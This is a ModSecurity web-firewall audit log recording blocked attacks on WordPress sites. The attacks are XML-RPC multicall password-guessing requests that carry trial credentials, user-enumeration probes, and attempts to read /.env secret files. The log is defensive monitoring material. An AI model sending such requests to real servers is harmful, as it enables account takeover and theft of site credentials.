220.158.233.221 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.221 X-Forwarded-Proto: https Connection: close Content-Length: 492 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --2ee4d81e-C-- system.multicallmethodNamewp.getUsersBlogsparamsrizalfadilrizalfadil1975 --2ee4d81e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2ee4d81e-E-- --2ee4d81e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.221 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748434550452929 5472 (- - -) Stopwatch2: 1748434550452929 5472; combined=4410, p1=472, p2=3763, p3=0, p4=0, p5=106, sr=86, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2ee4d81e-Z-- --1dbdf078-A-- [28/May/2025:19:23:33 +0700] aDcAReszXCullgn3bbHBAwAAAA4 103.236.140.4 43750 103.236.140.4 8181 --1dbdf078-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 113.160.208.58 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 113.160.208.58 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1dbdf078-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1dbdf078-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748435013677194 1996 (- - -) Stopwatch2: 1748435013677194 1996; combined=1026, p1=350, p2=650, p3=0, p4=0, p5=26, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1dbdf078-Z-- --d262b130-A-- [28/May/2025:19:28:51 +0700] aDcBgw3r-0gDryHAyD_ekAAAAEs 103.236.140.4 44162 103.236.140.4 8181 --d262b130-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.190.36.54 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.190.36.54 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d262b130-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d262b130-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748435331241834 2182 (- - -) Stopwatch2: 1748435331241834 2182; combined=1039, p1=352, p2=667, p3=0, p4=0, p5=20, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d262b130-Z-- --0d19834c-A-- [28/May/2025:19:31:58 +0700] aDcCPhwBHP_x2VCWa06a7wAAANE 103.236.140.4 44374 103.236.140.4 8181 --0d19834c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.117.233 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.117.233 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --0d19834c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0d19834c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748435518076586 773 (- - -) Stopwatch2: 1748435518076586 773; combined=320, p1=278, p2=0, p3=0, p4=0, p5=42, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0d19834c-Z-- --e2079631-A-- [28/May/2025:19:32:16 +0700] aDcCUBwBHP_x2VCWa06a9QAAAMc 103.236.140.4 44410 103.236.140.4 8181 --e2079631-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.117.233 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.117.233 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --e2079631-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e2079631-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748435536889515 794 (- - -) Stopwatch2: 1748435536889515 794; combined=330, p1=290, p2=0, p3=0, p4=0, p5=40, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e2079631-Z-- --5315801f-A-- [28/May/2025:19:44:37 +0700] aDcFNfnnEwDNUSjDseIuhQAAAJA 103.236.140.4 45508 103.236.140.4 8181 --5315801f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.119.97.244 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.119.97.244 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5315801f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5315801f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748436277243315 3071 (- - -) Stopwatch2: 1748436277243315 3071; combined=1369, p1=457, p2=881, p3=0, p4=0, p5=30, sr=81, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5315801f-Z-- --17bd9339-A-- [28/May/2025:19:45:33 +0700] aDcFbRwBHP_x2VCWa06bRwAAANg 103.236.140.4 45606 103.236.140.4 8181 --17bd9339-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 99.56.194.42 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 99.56.194.42 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --17bd9339-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --17bd9339-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748436333452643 3157 (- - -) Stopwatch2: 1748436333452643 3157; combined=1411, p1=499, p2=881, p3=0, p4=0, p5=31, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --17bd9339-Z-- --83a7965b-A-- [28/May/2025:19:51:52 +0700] aDcG6A3r-0gDryHAyD_fPQAAAEo 103.236.140.4 46192 103.236.140.4 8181 --83a7965b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 147.182.137.182 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 147.182.137.182 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --83a7965b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --83a7965b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748436712258470 787 (- - -) Stopwatch2: 1748436712258470 787; combined=333, p1=294, p2=0, p3=0, p4=0, p5=38, sr=82, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --83a7965b-Z-- --83b8f86b-A-- [28/May/2025:19:58:12 +0700] aDcIZBwBHP_x2VCWa06blwAAAM4 103.236.140.4 46626 103.236.140.4 8181 --83b8f86b-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 178.18.250.175 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 178.18.250.175 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --83b8f86b-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelPrismi123 --83b8f86b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --83b8f86b-E-- --83b8f86b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 178.18.250.175 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748437092134281 5410 (- - -) Stopwatch2: 1748437092134281 5410; combined=4345, p1=454, p2=3595, p3=0, p4=0, p5=197, sr=83, sw=99, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --83b8f86b-Z-- --a2295c0c-A-- [28/May/2025:20:05:19 +0700] aDcKDw3r-0gDryHAyD_fkQAAAFM 103.236.140.4 47186 103.236.140.4 8181 --a2295c0c-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 178.18.250.175 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 178.18.250.175 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --a2295c0c-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminantix123@@ --a2295c0c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a2295c0c-E-- --a2295c0c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 178.18.250.175 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748437519592328 6528 (- - -) Stopwatch2: 1748437519592328 6528; combined=4474, p1=542, p2=3744, p3=0, p4=0, p5=110, sr=99, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a2295c0c-Z-- --bdde2f4c-A-- [28/May/2025:20:14:48 +0700] aDcMSPnnEwDNUSjDseIvUQAAAI4 103.236.140.4 47816 103.236.140.4 8181 --bdde2f4c-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 84.247.150.34 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 84.247.150.34 X-Forwarded-Proto: https Connection: close Content-Length: 486 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --bdde2f4c-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelfaadhel@000 --bdde2f4c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bdde2f4c-E-- --bdde2f4c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 84.247.150.34 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748438088374144 4886 (- - -) Stopwatch2: 1748438088374144 4886; combined=3763, p1=407, p2=3186, p3=0, p4=0, p5=101, sr=78, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bdde2f4c-Z-- --5f34b82d-A-- [28/May/2025:20:18:18 +0700] aDcNGhwBHP_x2VCWa06cEwAAAMg 103.236.140.4 48090 103.236.140.4 8181 --5f34b82d-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 84.247.150.34 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 84.247.150.34 X-Forwarded-Proto: https Connection: close Content-Length: 486 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --5f34b82d-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelfaadhel1236 --5f34b82d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5f34b82d-E-- --5f34b82d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 84.247.150.34 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748438298493524 4469 (- - -) Stopwatch2: 1748438298493524 4469; combined=3504, p1=361, p2=2977, p3=0, p4=0, p5=97, sr=77, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5f34b82d-Z-- --0fb1976a-A-- [28/May/2025:20:20:50 +0700] aDcNsvnnEwDNUSjDseIvgwAAAIM 103.236.140.4 48316 103.236.140.4 8181 --0fb1976a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.223.221.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.223.221.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --0fb1976a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0fb1976a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748438450727912 2984 (- - -) Stopwatch2: 1748438450727912 2984; combined=1436, p1=447, p2=953, p3=0, p4=0, p5=35, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0fb1976a-Z-- --786a532c-A-- [28/May/2025:20:24:24 +0700] aDcOiOszXCullgn3bbHDHwAAABA 103.236.140.4 48586 103.236.140.4 8181 --786a532c-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 54.36.142.130 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 54.36.142.130 X-Forwarded-Proto: https Connection: close Content-Length: 491 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --786a532c-C-- system.multicallmethodNamewp.getUsersBlogsparamsrizalfadil987rizalfadil --786a532c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --786a532c-E-- --786a532c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 54.36.142.130 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748438664047496 5756 (- - -) Stopwatch2: 1748438664047496 5756; combined=4376, p1=504, p2=3707, p3=0, p4=0, p5=99, sr=85, sw=66, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --786a532c-Z-- --22aff13c-A-- [28/May/2025:20:25:18 +0700] aDcOvhwBHP_x2VCWa06cTQAAAMk 103.236.140.4 48640 103.236.140.4 8181 --22aff13c-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 107.180.237.122 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 107.180.237.122 X-Forwarded-Proto: https Connection: close Content-Length: 490 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --22aff13c-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelAntheadarrigo92 --22aff13c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --22aff13c-E-- --22aff13c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 107.180.237.122 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748438718382845 5245 (- - -) Stopwatch2: 1748438718382845 5245; combined=3855, p1=459, p2=3232, p3=0, p4=0, p5=97, sr=81, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --22aff13c-Z-- --a1c3b258-A-- [28/May/2025:20:32:34 +0700] aDcQcg3r-0gDryHAyD_gJwAAAFE 103.236.140.4 49288 103.236.140.4 8181 --a1c3b258-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 54.36.142.130 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 54.36.142.130 X-Forwarded-Proto: https Connection: close Content-Length: 496 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --a1c3b258-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhel[login][login]faadhel --a1c3b258-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a1c3b258-E-- --a1c3b258-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 54.36.142.130 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748439154355518 4118 (- - -) Stopwatch2: 1748439154355518 4118; combined=3171, p1=332, p2=2641, p3=0, p4=0, p5=138, sr=74, sw=60, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a1c3b258-Z-- --403ad347-A-- [28/May/2025:20:33:08 +0700] aDcQlA3r-0gDryHAyD_gLwAAAFY 103.236.140.4 49308 103.236.140.4 8181 --403ad347-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.237 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.237 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --403ad347-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelfaadhelns --403ad347-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --403ad347-E-- --403ad347-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.237 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748439188137225 5858 (- - -) Stopwatch2: 1748439188137225 5858; combined=4236, p1=499, p2=3572, p3=0, p4=0, p5=98, sr=99, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --403ad347-Z-- 